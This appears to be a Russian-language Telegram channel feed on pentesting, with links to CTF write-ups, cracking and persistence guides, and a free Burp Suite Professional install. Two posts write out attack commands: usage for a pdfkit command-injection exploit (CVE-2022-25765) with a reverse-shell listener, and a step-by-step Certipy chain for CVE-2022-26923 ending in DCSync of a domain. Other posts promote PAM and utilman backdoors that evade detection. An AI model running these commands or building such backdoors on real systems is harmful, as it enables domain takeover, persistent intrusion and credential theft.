Privileger
Privileger позволяет вам максимально просто работать с привилегиями в ОС Windows. Присутствуют следующие режимы:
◽️Добавить привилегии аккаунту.
◽️Запустить процесс, добавив в его токен конкретную привилегию.
◽️Удалить у пользователя привилегию.
◽️Режим поиска. Позволяет обнаруживать на конкретном компьютере объекты, обладающие какой-либо привилегией.
◽️Перечислить все привилегии, которые назначены конкретному аккаунту.
Подробнее: https://github.com/MzHmO/Privileger
#софт
Privileger позволяет вам максимально просто работать с привилегиями в ОС Windows. Присутствуют следующие режимы:
◽️Добавить привилегии аккаунту.
◽️Запустить процесс, добавив в его токен конкретную привилегию.
◽️Удалить у пользователя привилегию.
◽️Режим поиска. Позволяет обнаруживать на конкретном компьютере объекты, обладающие какой-либо привилегией.
◽️Перечислить все привилегии, которые назначены конкретному аккаунту.
Подробнее: https://github.com/MzHmO/Privileger
#софт
🔥5👍1
PDFkit-CMD-Injection (CVE-2022-25765)
Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6
Использование:
Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)
Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE
Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6
Использование:
nc -lvnp 1337
./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)
Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE
GitHub
GitHub - nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765: Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6
Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 - nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765
❤4👍1
Forwarded from SecurityLab.ru
Принятие законопроекта о "белых хакерах" в России, предлагающего ввести понятие bug bounty в правовое поле и изменения в Уголовный кодекс, может быть отложено из-за недовольства ФСБ и ФСТЭК. Силовые ведомства выступают против либерализации положений УК и высказали соответствующую позицию на рабочих совещаниях по законопроекту.
#белыехакеры #bugbounty #Уголовныйкодекс #ФСБ #ФСТЭК
#белыехакеры #bugbounty #Уголовныйкодекс #ФСБ #ФСТЭК
SecurityLab.ru
Законопроект о "белых хакерах" застрял на стадии обсуждения из-за позиции ФСБ
Введение понятия bug bounty в правовое поле может быть отложено.
🤯2
🦊Как установить Burp Suite Professional на Kali Linux бесплатно и использовать свой любимый браузер для работы с ним с помощью FoxyProxy🦊
Читать: https://teletype.in/@hackerblog/OPJvU17aAxW
Ссылка на репозиторий: https://github.com/SNGWN/Burp-Suite
#софт #полезные_материалы
Читать: https://teletype.in/@hackerblog/OPJvU17aAxW
Ссылка на репозиторий: https://github.com/SNGWN/Burp-Suite
#софт #полезные_материалы
Teletype
Установка Burp Suite Professoinal + FoxyProxy на Kali Linux by artrone
Всех приветствую! Сегодня я покажу вам метод установки Burp Suite Professional бесплатно и использования вашего браузера для работы...
🔥5👍3❤1
🦄Шпаргалка по использованию Hydra для разных служб🦄
Читать: https://github.com/frizb/Hydra-Cheatsheet
#литература #полезные_материалы
Читать: https://github.com/frizb/Hydra-Cheatsheet
#литература #полезные_материалы
GitHub
GitHub - frizb/Hydra-Cheatsheet: Hydra Password Cracking Cheetsheet
Hydra Password Cracking Cheetsheet. Contribute to frizb/Hydra-Cheatsheet development by creating an account on GitHub.
🔥2
Всем привет 👋
После долгого простоя, я решил продолжить вести канал.
Немного изменений:
• Новый соведущий @cherepawwka
• Канал будет в форме статей, т.е. не будет постов по типу «тулза - ссылка»
• Периодичность постов будет примерно раз в неделю-две
• Статьи будут от разных авторов, а также совместные (в том числе райтапы)
• Теперь тематика канала будет направлена на уязвимости и их эксплуатацию , а также дефенсу (как повезет)
Старый контент останется на месте, поскольку там есть что-то полезное
Ну, основные моменты я вроде перечислил.
Спасибо тем, кто остался 🤝
После долгого простоя, я решил продолжить вести канал.
Немного изменений:
• Новый соведущий @cherepawwka
• Канал будет в форме статей, т.е. не будет постов по типу «тулза - ссылка»
• Периодичность постов будет примерно раз в неделю-две
• Статьи будут от разных авторов, а также совместные (в том числе райтапы)
• Теперь тематика канала будет направлена на уязвимости и их эксплуатацию , а также дефенсу (как повезет)
Старый контент останется на месте, поскольку там есть что-то полезное
Ну, основные моменты я вроде перечислил.
Спасибо тем, кто остался 🤝
🔥18❤2
Не знаю почему, но свое возвращение хотелось бы начать с райтапа 🤨
Тачка: Системный администратор
Категория: Active Directory
Платформа: Codeby Games
Читать: тык
UPD: Кстати, как относитесь к райтапам? Есть идея выложить целых 5 штук по этой категории на платформе Codeby. Интересно будет?
#active_directory #райтап
Тачка: Системный администратор
Категория: Active Directory
Платформа: Codeby Games
Читать: тык
UPD: Кстати, как относитесь к райтапам? Есть идея выложить целых 5 штук по этой категории на платформе Codeby. Интересно будет?
#active_directory #райтап
Teletype
Codeby Games "Системный администратор" Active Directory WriteUp by artrone
Доброго дня, мои начинающие хацкеры! В последнее время, стало популярным ломать АД. Не знаю, с чем это связано, но да ладно. Сегодня...
❤🔥7⚡1🔥1
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #active_directory
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
# УстановкаНачнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
pip install certipy-ad
# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10
# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
certipy auth -pfx testpc.pfx
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!
#пентест #active_directory
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍1😁1
Тачка: Королевство
Категория: Active Directory
Платформа: Codeby Games
Закрепляем навыки атак на контроллер домена Active Directory🖼:
пылесосим сетевые ресурсы,
перечисляем LDAP,
устраиваем прожарку Kerberos,
дампим доменного администратора😉
Читать: тык
P.S. Скоро будет не только текстовый формат
#active_directory #райтап
Категория: Active Directory
Платформа: Codeby Games
Закрепляем навыки атак на контроллер домена Active Directory🖼:
пылесосим сетевые ресурсы,
перечисляем LDAP,
устраиваем прожарку Kerberos,
дампим доменного администратора😉
Читать: тык
P.S. Скоро будет не только текстовый формат
#active_directory #райтап
❤🔥8❤2👍1
👾Закрепление в системе через RDP👾
Рассмотрим необычный способ закрепиться в системе, используя дефолтную служебную прогу utilman.exe
Читать: тык
Смотреть: тык
UPD: Что ж, материал переходит на новый уровень, как и обещал. Прошу обратную связь, касательно видео подачи.
#персист
Рассмотрим необычный способ закрепиться в системе, используя дефолтную служебную прогу utilman.exe
Читать: тык
Смотреть: тык
UPD: Что ж, материал переходит на новый уровень, как и обещал. Прошу обратную связь, касательно видео подачи.
#персист
Teletype
Persistence via RDP by artrone
Внимание! Статья несёт исключительно информативный характер. Подобные действия преследуются по закону!
❤9👍3😁1
🎉 Всех с наступающим 🎉
Хотелось бы всем пожелать упорства, трудолюбия и побольше мотивации 😇
Хотелось бы всем пожелать упорства, трудолюбия и побольше мотивации 😇
❤🔥16
🚪PAM backdoor for SSH Часть 1/2🚪
В данной статье мы рассмотрим создание собственного модуля PAM для закрепления в системе, научимся правильно редачить конфиги и заметать следы своего присутствия.
Читать: https://teletype.in/@hackerblog/pam_backdoor_part_1
Смотреть: https://www.youtube.com/watch?v=puf7jLTga1o
UPD: вторая часть будет на днях
#персист
В данной статье мы рассмотрим создание собственного модуля PAM для закрепления в системе, научимся правильно редачить конфиги и заметать следы своего присутствия.
Читать: https://teletype.in/@hackerblog/pam_backdoor_part_1
Смотреть: https://www.youtube.com/watch?v=puf7jLTga1o
UPD: вторая часть будет на днях
#персист
Teletype
PAM backdoor by artrone ЧАСТЬ 1/2
Внимание! Статья несёт исключительно информативный характер. Подобные действия преследуются по закону!
❤🔥6👍3🤯3💯1
🚪PAM backdoor Часть 2/2🚪
Во второй части статьи мы углубляемся в тему внедрения backdoor'ов, рассматривая PAM. Мы пройдем через процесс изменения исходного кода в личных целях и его замены с легитимным файлом, освещая ключевые моменты и рассматривая общие техники ухода от детектирования.
Читать: https://teletype.in/@hackerblog/pam_backdoor_part_2
#персист
Во второй части статьи мы углубляемся в тему внедрения backdoor'ов, рассматривая PAM. Мы пройдем через процесс изменения исходного кода в личных целях и его замены с легитимным файлом, освещая ключевые моменты и рассматривая общие техники ухода от детектирования.
Читать: https://teletype.in/@hackerblog/pam_backdoor_part_2
#персист
Teletype
PAM backdoor by artrone ЧАСТЬ 2/2
Добро пожаловать во вторую часть статьи "PAM backdoor". В предыдущей части мы обсудили, что такое PAM (Pluggable Authentication Modules)...
❤🔥8👍2🍌2🍓1
Этот материал подойдёт для тех, кто никогда не работал с Command & Control (C&C, C2) фрэймворком Metasploit или просто хочет познакомиться с ним получше
Здесь мы рассмотрим:
Читать: https://teletype.in/@hackerblog/metasploit
#пентест #софт
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
Metasploit Framework 101 by cherepawwka
Сегодня мы чуть подробнее познакомимся с фрэймворком Metasploit, его консолью и инструментом msfvenom, а также посмотрим на него в действии.
❤5
Forwarded from Похек (Сергей Зыбнев)
#AMA
Что такое AMA (Ask Me Anything) эфир? Стрим, когда вы мне сможете задавать любые адекватные и даже личные вопросы в разумных рамках. Подобное уже делал уважаемый @CuriV на своем канале @pathsecure.
Буду благодарен коллегам за репост!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤2🌭2